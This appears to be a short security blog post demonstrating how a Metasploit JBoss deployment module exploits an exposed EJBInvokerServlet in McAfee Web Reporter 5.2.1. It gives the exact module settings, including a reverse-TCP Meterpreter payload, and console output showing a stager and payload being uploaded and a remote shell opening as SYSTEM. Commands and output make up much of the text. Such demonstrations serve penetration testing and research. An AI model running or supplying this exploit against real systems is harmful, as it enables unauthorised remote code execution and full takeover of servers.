Metasploit Demo: JBoss DeploymentFileRepository WAR Deployment

Not really a new module but with the correct settings it can be used to exploit the recently disclosed Apache Tomcat/JBoss EJBInvokerServlet/JMXInvokerServlet (RMI over HTTP) Marshalled Object Remote Code Execution vulnerability in McAfee Web Reporter 5.2.1. In this case I had much better luck with the Java payloads.

This module can be used to execute a payload on JBoss servers that have an exposed HTTPAdaptor’s JMX Invoker exposed on the “JMXInvokerServlet”. By invoking the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed to finally upload the selected payload to the target. The DeploymentFileRepository methods are only available on Jboss 4.x and 5.x.


use exploit/multi/http/jboss_invoke_deploy
set TARGETURI /invoker/EJBInvokerServlet/
set RPORT 9111
set payload java/meterpreter/reverse_tcp

[*] Started reverse handler on
[*] Attempting to automatically select a target
[*] Attempting to automatically detect the platform
[*] Attempting to automatically detect the architecture
[*] Automatically selected target: “Windows Universal”
[*] Deploying stager
[*] Calling stager: /QAQoJzDmGKHYVJ/BUvtkZBcHzPYhJ.jsp
[*] Uploading payload through stager
[*] Calling payload: /ibFnaehA/ltvkpXyNtZkoUP.jsp
[*] Removing payload through stager
[*] Removing stager
[*] Sending stage (30355 bytes) to
[*] Meterpreter session 1 opened ( -> at 2013-10-13 13:38:23 -0400

meterpreter > getuid
Server username: SYSTEM